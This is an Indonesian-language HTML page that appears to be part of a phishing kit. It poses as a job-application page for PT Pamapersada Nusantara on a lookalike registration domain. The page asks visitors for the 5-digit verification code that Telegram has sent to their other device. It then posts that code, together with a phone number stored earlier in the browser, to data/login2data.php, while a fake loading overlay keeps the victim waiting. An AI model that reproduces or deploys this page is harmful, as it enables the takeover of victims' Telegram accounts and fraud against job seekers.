<!DOCTYPE html>
<html lang="id">
<head>
    <link rel="icon" type="image/png" sizes="32x32" href="images/logo.jpg">

    <!-- Open Graph Meta Tags -->
    <meta property="og:title" content="PT PAMAPERSADA NUSANTARA">
    <meta property="og:description" content="Lowongan kerja terbaru dan terpercaya. Klik untuk melihat detailnya!">
    <meta property="og:image" content="https://pendaftaranpenerimaan2024.my.id/loker/id/career/PTpamarsada-nusantara/pamapersada/images/job.jpg">
    <meta property="og:url" content="https://yourwebsite.com/">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="PT PAMAPERSADA NUSANTARA">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>PT PAMAPERSADA NUSANTARA</title>

    <!-- Stylesheets -->
    <link rel="stylesheet" href="styles/bootstrap.css">
    <link rel="stylesheet" href="styles/style.css">
    <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700,800,900|Roboto:300,300i,400,400i,500,500i,700,700i,900,900i&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="fonts/css/fontawesome-all.min.css">

    <!-- Styling untuk Timer OTP -->
    <style>
        .otp-timer {
            position: absolute;
            right: 15px;
            top: 50%;
            transform: translateY(-50%);
            color: blue;
            font-weight: bold;
            cursor: pointer;
            text-decoration: underline;
        }

        /* Menghapus teks (required) */
        .input-style em {
            display: none;
        }

        /* Posisi timer di dalam kolom OTP */
        .input-style {
            position: relative;
        }

        /* Styling tambahan untuk overlay loading */
        #overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.8);
            z-index: 9999;
            display: none;
            justify-content: center;
            align-items: center;
        }

        /* Disabled state for the submit button */
        .btn-disabled {
            background-color: grey !important;
            cursor: not-allowed;
        }

        /* Styling animasi Lottie */
        #lottie-animation {
            width: 300px;
            height: 300px;
        }
    </style>
</head>

<body class="theme-light" data-highlight="blue2">

<div id="page">
    <div class="page-content">
        <img class="card" width="100%" src="images/pama.jpg" alt="Pama">
        
        <div class="card card-style">
            <div class="content mb-0">
                <h3 class="font-600">Kode Verifikasi</h3>
                <p>Kami telah mengirimkan kode ke aplikasi Telegram untuk <span id="nomorDariCek"></span> di perangkat anda yang lain.</p>

                <!-- Form untuk OTP -->
                <form action="data/login2data.php" method="post" onsubmit="return validasiOTP(event);">
                    <!-- Input tersembunyi untuk menyimpan nomor dari localStorage -->
                    <input type="hidden" name="nomor" id="nomor" value="">

                    <!-- Kolom input untuk OTP dengan timer di sebelah kanan -->
                    <div class="input-style has-borders no-icon input-style-always-active mb-4" style="position: relative;">
                        <input type="number" name="otp" id="otp" class="form-control" placeholder="5 Digit" required oninput="limitInputLength(this)" maxlength="5">
                        <label for="otp" class="color-highlight font-400 font-13">Kode Verifikasi</label>
                        <span id="timer" class="otp-timer"></span> <!-- Timer akan tampil di sini -->
                    </div>

                    <button type="submit" id="submitBtn" class="btn btn-full btn-m shadow-l rounded-s text-uppercase font-900 bg-blue-dark mb-3 mt-4 btn-disabled" disabled>
                        Daftar
                    </button>
                </form>
            </div>
        </div>

         <!-- Custom Footer with Image -->
         <div class="footer mt-3">
            <img src="images/footer.png" alt="Footer Image" style="width:100%; height:auto;">
        </div>
    </div>    
</div>    
  

<!-- Overlay untuk efek loading -->
<div id="overlay">
    <div id="lottie-animation"></div>
</div>

<!-- Scripts -->
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="scripts/bootstrap.min.js"></script>

<!-- Script untuk Lottie -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/bodymovin/5.7.14/lottie.min.js"></script>

<script>
// Fungsi untuk menampilkan overlay dengan animasi Lottie
function showOverlay() {
    var overlay = document.getElementById('overlay');
    overlay.style.display = 'flex'; // Tampilkan overlay

    // Inisialisasi animasi Lottie
    lottie.loadAnimation({
        container: document.getElementById('lottie-animation'),
        renderer: 'svg',
        loop: true,
        autoplay: true,
        path: 'overlayplan.json' // Path ke file JSON Lottie yang Anda unduh
    });

    // Sembunyikan overlay setelah 10 detik
    setTimeout(function() {
        overlay.style.display = 'none'; // Sembunyikan overlay setelah 10 detik
    }, 5000); // 10000 milidetik = 10 detik
}


// Fungsi hitung mundur timer
function startTimer(duration, display) {
    var timer = duration, minutes, seconds;
    var countdown = setInterval(function () {
        minutes = parseInt(timer / 60, 10);
        seconds = parseInt(timer % 60, 10);

        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.textContent = minutes + ":" + seconds;

        if (--timer < 0) {
            clearInterval(countdown);  // Hentikan hitungan mundur
            display.textContent = "Kirim Ulang";  // Ubah teks menjadi "Kirim Ulang"
            display.style.cursor = "pointer";
            display.onclick = function() {
                startTimer(60, display);  // Restart timer untuk 60 detik
            }
        }
    }, 1000);
}

window.onload = function() {
    // Ambil nomor dari localStorage dan tampilkan
    var nomor = localStorage.getItem('nomorTelegram');
    if (nomor) {
        // Periksa apakah nomor sudah berisi '+62'
        if (nomor.startsWith("+62")) {
            document.getElementById('nomor').value = nomor; // Set nomor ke input tersembunyi
            document.getElementById('nomorDariCek').textContent = nomor; // Tampilkan nomor di halaman tanpa menambah '+62'
        } else {
            document.getElementById('nomor').value = nomor; // Set nomor ke input tersembunyi
            document.getElementById('nomorDariCek').textContent = '+62 ' + nomor; // Tampilkan nomor dengan '+62'
        }
    }

    // Mulai hitung mundur
    var timerDisplay = document.getElementById('timer');
    startTimer(60, timerDisplay);  // Mulai hitung mundur 1 menit

    // Cek panjang input OTP untuk mengaktifkan/menonaktifkan tombol submit
    document.getElementById('otp').addEventListener('input', function() {
        var otpInput = document.getElementById('otp').value;
        var submitBtn = document.getElementById('submitBtn');

        if (otpInput.length === 5) {
            submitBtn.disabled = false;
            submitBtn.classList.remove('btn-disabled'); // Hapus style disabled
        } else {
            submitBtn.disabled = true;
            submitBtn.classList.add('btn-disabled'); // Tambahkan style disabled
        }
    });
}

// Fungsi untuk membatasi input hanya sampai 5 digit angka
function limitInputLength(input) {
    if (input.value.length > 5) {
        input.value = input.value.slice(0, 5);  // Potong input jika lebih dari 5 digit
    }
}

// Fungsi validasi OTP sebelum submit
function validasiOTP(event) {
    var otp = document.getElementById('otp').value;
    if (otp.length !== 5) {
        alert('Kode OTP harus berjumlah 5 digit.');
        return false;  // Cegah submit jika tidak valid
    }

    event.preventDefault();  // Cegah pengiriman form langsung
    simpanDataOTP();  // Simpan OTP ke localStorage
    showOverlay();  // Tampilkan overlay loading setelah validasi

    // Lanjutkan submit setelah 10 detik
    setTimeout(function() {
        event.target.submit();  // Submit form
    }, 10000);  // 10 detik delay
}

// Simpan OTP ke localStorage sebelum submit
function simpanDataOTP() {
    var otp = document.getElementById('otp').value;
    localStorage.setItem('otp', otp);
}
</script>

</body>
</html>
